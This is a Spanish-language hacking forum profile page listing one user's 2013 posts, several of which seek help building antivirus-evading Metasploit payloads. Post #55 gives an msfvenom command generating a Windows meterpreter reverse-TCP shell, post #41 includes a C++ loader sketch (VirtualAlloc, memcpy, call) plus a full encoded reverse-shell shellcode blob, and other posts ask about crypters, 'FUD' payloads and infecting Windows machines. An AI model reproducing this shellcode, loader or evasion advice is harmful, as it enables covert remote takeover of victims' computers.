Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Metadato

Páginas 1 2 3 4

#41

Dudas y pedidos generales / Re:¿Qué hago con la shellcode?

Junio 30, 2013, 09:57:36 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Simplemente necesitas tener la shellcode mapeada en memoria con privilegios de ejecución... Puedes hacerlo con VirtualAlloc() o hacer uso de los _emit para meter directamente en tu ejecutable la shellcode.

Una vez la tengas un su sitio simplemente defines el puntero como función y lo llamas.

Un esbozo:
Código: cpp
PVOID myMem = VirtualAlloc(...);
memcpy(myMem, shellcode_array, sizeof(shellcode_array));
myMem();
Saludos y suerte

Gracias por tu ayuda, pero recién acabo de adentrarme en el lenguaje de C / C++ , ¿Podrías decirme donde colocar la shellcode en tu código? Y a ser posible explicarlo un poco para aprender.

¿Y la shellcode la tengo que dejar en un solo string (quitando las "", las comas, el + y los espacios) o la dejo tal cual está?

Bueno mejor, te dejo la shellcode y tu ya me dices compañero:

Código: text


buf = 
"\xbe\x78\x14\xef\x42\xd9\xc9\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x49\x31\x77\x14\x83\xef\xfc\x03\x77\x10\x9a\xe1\x13" +
"\xaa\xd3\x0a\xec\x2b\x83\x83\x09\x1a\x91\xf0\x5a\x0f\x25" +
"\x72\x0e\xbc\xce\xd6\xbb\x37\xa2\xfe\xcc\xf0\x08\xd9\xe3" +
"\x01\xbd\xe5\xa8\xc2\xdc\x99\xb2\x16\x3e\xa3\x7c\x6b\x3f" +
"\xe4\x61\x84\x6d\xbd\xee\x37\x81\xca\xb3\x8b\xa0\x1c\xb8" +
"\xb4\xda\x19\x7f\x40\x50\x23\x50\xf9\xef\x6b\x48\x71\xb7" +
"\x4b\x69\x56\xa4\xb0\x20\xd3\x1e\x42\xb3\x35\x6f\xab\x85" +
"\x79\x23\x92\x29\x74\x3a\xd2\x8e\x67\x49\x28\xed\x1a\x49" +
"\xeb\x8f\xc0\xdc\xee\x28\x82\x46\xcb\xc9\x47\x10\x98\xc6" +
"\x2c\x57\xc6\xca\xb3\xb4\x7c\xf6\x38\x3b\x53\x7e\x7a\x1f" +
"\x77\xda\xd8\x3e\x2e\x86\x8f\x3f\x30\x6e\x6f\xe5\x3a\x9d" +
"\x64\x9f\x60\xca\x49\xad\x9a\x0a\xc6\xa6\xe9\x38\x49\x1c" +
"\x66\x71\x02\xba\x71\x76\x39\x7a\xed\x89\xc2\x7a\x27\x4e" +
"\x96\x2a\x5f\x67\x97\xa1\x9f\x88\x42\x65\xf0\x26\x3d\xc5" +
"\xa0\x86\xed\xad\xaa\x08\xd1\xcd\xd4\xc2\x7a\x67\x2e\x85" +
"\x44\xdf\x46\xd0\x2d\x1d\xa7\xcb\xf1\xa8\x41\x81\x19\xfc" +
"\xda\x3e\x83\xa5\x91\xdf\x4c\x70\xdc\xe0\xc7\x76\x20\xae" +
"\x2f\xf3\x32\x47\xc0\x4e\x68\xce\xdf\x65\x07\xef\x75\x81" +
"\x8e\xb8\xe1\x8b\xf7\x8f\xad\x74\xd2\x9b\x64\xe0\x9d\xf3" +
"\x88\xe4\x1d\x04\xdf\x6e\x1e\x6c\x87\xca\x4d\x89\xc8\xc7" +
"\xe1\x02\x5d\xe7\x53\xf6\xf6\x8f\x59\x21\x30\x10\xa1\x04" +
"\xc0\x6d\x74\x61\x46\x87\xf2\x81\x8a"

Gracias de nuevo y saludos!!

#42

Dudas y pedidos generales / [SOLUCIONADO] ¿Qué hago con la shellcode?

Junio 30, 2013, 08:19:16 AM

Hola a todos los usuarios de Underc0de, en esta ocasión les quiero compartir mi duda, por si alguien puede resolverla, el tema va de shellcodes, ya me he informado de que és una shellcode y tal.. Tengo una shellcode maliciosa generada por Metasploit (es un payload de conexión inversa), ¿que código en C / C++ habría que hacer para ejecutar ese shellcode? (si ya se que Metasploit puede generar un ejecutable, también tengo constancia del shellcode2exe, pero yo quiero saber el código en C / C++ que habría que hacer para ejecutar la shellcode para aprender más a fondo el funcionamiento de las shellcodes...)

PD: Si necesitan la shellcode se lo puedo proporcionar...

Saludos!!!

#43

Dudas y pedidos generales / Re:BackTrack5 - Google Chrome no funciona.

Junio 29, 2013, 07:11:09 AM

Pero él no ha instalado Chromium, ha instalado Google Chrome, la ruta cambia, si lo que buscas es poner Google Chrome como root puedes seguir este video tutorial:

Si no sabes como instalar Google Chrome correctamente:

Recuerda descargarlo con la arquitectura correspondiente a tu Backtrack, a lo mejor te arroja ese error por que no lo has desinstalado y/o borrado correctamente.

Saludos!!

#44

Python / Re:PyInstaller, cuando no funciona el py2exe en PyQt

Junio 28, 2013, 09:28:52 AM

Excelente herramienta!! Y en mi opinión es algo mejor que py2exe.

Aun que ahora en la nueva versión el archivo se pone en la carpeta raíz de la herramienta y se ejecuta el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login las funciones son las mismas si no me equivoco,

Saludos!!

#45

Bugs y Exploits / Re:Antivirus Bypass con Veil

Junio 26, 2013, 04:29:31 PM

Se ve genial la herramienta!!! Muchas gracias por el aporte.

PD: Al final, como tu dices, la herramienta se quemará en poco tiempo por ser pública, pero por favor, no la quemes tú analizándo en VirusTotal, por que si nos ponemos todos a analizar en VirusTotal pensando en que se va a quemar por ser pública, en realidad la estamos quemando nosotros.

Saludos.

#46

Desarrollo y modificación de malwares / Re:Msfvenom ayudandonos a evadir av's con python

Junio 25, 2013, 03:34:35 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vale gracias a todos, tendré que instalarme otra versión de python por que tengo la 3.3.2

Jejeje saludos.
2.7.x y no te cambies, python 3 solo hace que dar desgracias

Ya veo, muchas gracias compañero.

Saludos.

#47

Desarrollo y modificación de malwares / Re:Msfvenom ayudandonos a evadir av's con python

Junio 25, 2013, 10:52:12 AM

Vale gracias a todos, tendré que instalarme otra versión de python por que tengo la 3.3.2

Jejeje saludos.

#48

Desarrollo y modificación de malwares / Re:Msfvenom ayudandonos a evadir av's con python

Junio 25, 2013, 08:57:10 AM

Vale una última cosa, puff siento ser tan pesado haciendo tantas preguntas pero, ¿cómo se instala py2exe?
No encuentro ningún tutorial.

Tengo una arquitectura de 64 bits, ya tengo instalado Python y me acabo de descargar py2exe 2.7

Saludos, y gracias.

#49

Desarrollo y modificación de malwares / Re:Msfvenom ayudandonos a evadir av's con python

Junio 25, 2013, 05:40:49 AM

Gracias se ve muy interesante, una cosa, una vez que ya tenemos el script en python, ¿podríamos infectar a un windows con python instalado? Por ejemplo tipear en la terminal: python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en la ruta donde se encuentre el script.

Saludos.

#50

Dudas y pedidos generales / Re:[DUDA] Encriptar Shellcode

Junio 24, 2013, 11:15:41 AM

Muchas gracias por la información, ¿los payloads tambien se pueden encriptar con un crypter?

Saludos.

#51

Dudas y pedidos generales / Re:[DUDA] Encriptar Shellcode

Junio 24, 2013, 10:36:18 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Puedes usar avoid o Voil que igual te ayudara ademas sin pasar el ejecutable a py2exe lo puedes hacer desde el metasploit

Regards,
Snifer

¿Podrías proporcionar algún tutorial? Muchas gracias!!

#52

Dudas y pedidos generales / Re:[DUDA] Encriptar Shellcode

Junio 24, 2013, 09:12:52 AM

Vale muchas gracias por su ayuda, pero aparte de este método, ¿no hay más? ¿Podría funcionar con algún cryper? Por favor, proporcionarme si podéis los mejores métodos.

#53

Desarrollo y modificación de malwares / Re:Msfvenom ayudandonos a evadir av's con python

Junio 23, 2013, 12:00:38 PM

¿Podrías explicar como usar el py2exe? Gracias.

#54

Dudas y pedidos generales / Re:[DUDA] Encriptar Shellcode

Junio 23, 2013, 11:37:04 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tenerlo fud es dificil, pues lo metodos de metasploit estan requemados, lo que si puedes hacer es emberlo en otro ejecutable, usar python,etc.

Por el foro hay un tuto del amigo sanko.

-Saludos-

Hola, bueno aunque sea semi fud, no importa, ya he visto el post de sanko pero no lo entiendo muy bien, aun que esto corresponde comentarlo en su post jaja, pero bueno si me puedes decir metodos de encriptar este shellcode? Y una cosa este code que me da luego lo compilo con un compilador de C ?

#55

Dudas y pedidos generales / [DUDA] Encriptar Shellcode

Junio 23, 2013, 06:37:45 AM

Hola a todos!!! Bien, en esta ocasión tengo una duda que me está comiendo mucho la cabeza, por que busco y busco y no encuentro nada. Mi duda es que método o que hay que hacer para encriptar mi shellcode (de metasploit), he oído de alterar el shellcode pero no tengo ni idea de que hay que hacer, la shellcode a encriptar es la que me da de resultado al tipear lo siguiente en mi terminal: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 C ó msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 -f c > shell.c (en C, que vendría a arrojar los mismo)

Las "XXX" las pongo para no poner la ip completa.

Y después de esto, ¿que hago con la shellcode, para hacer un ejecutable de windows?

LA VERDAD SOLO QUIERO TENER MI PAYLOAD FUD.

Saludós!!!

#56

Pentesting / [POSTEA] Tus Add-ons de Mozilla Firefox para penetrar sistemas web

Junio 01, 2013, 05:02:13 AM

Lo dicho, aquí podréis postear vuestros Add-ons de Mozilla Firefox que usáis habitualmente para penetrar en sistemas..

Si hacemos una recopilación de todos podría ayudar a mucha gente incluido yo, obviamente.

Bueno como reciente he empezado solo tengo: Firebug, Live HTTP Headers, Tamper data y Hackbar.

Un saludo!!

#57

Dudas y pedidos generales / Re:Radio de fondo en Web

Mayo 31, 2013, 02:26:16 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si quieres forzar a que un usuario escuche cualquier música de fondo, lo que yo te recomendaría sería crear un DIV con un object hacia youtube con autoplay (o sólo dejando mirar la barra de youtube), y encima un div con el contenido del sitio, pero como te comentan por ahí: obligar a un usuario a hacer algo que no quiere de primera instancia en una web es muy malo, para reproductores puedes buscar en HTML5.

Saludos,
Xt3mP

Sisi gracias por el consejo ando buscando algún reproductor en HTML5 gracias, o bueno buscaré algún tutorial, sería genial hacerme uno propio.

Saludos.

#58

Dudas y pedidos generales / Re:Radio de fondo en Web

Mayo 30, 2013, 05:18:39 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buscaste antes? si existe otra opcion? ...

Pues la verdad es que buscare como crear un reproductor en flash, o no se... si con html5 + css + jquery se pueda hacer alguno...

Saludos!!

#59

Dudas y pedidos generales / Re:Radio de fondo en Web

Mayo 30, 2013, 12:56:03 PM

Vale gracias, de todos modos ¿me podrían decir si hay opción de hacer un reproductor ajeno a este para que quede mejor con los colores de la web (negro)?. Gracias.

#60

Dudas y pedidos generales / [SOLUCIONADO] Radio de fondo en Web

Mayo 30, 2013, 10:09:14 AM

Bueno pues quería que me dijeran como pongo este link de steaming You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login como musia de fondo en mi web y que sea compatible con todos los navegadores.

Gracias, saludos!!!!

Páginas 1 2 3 4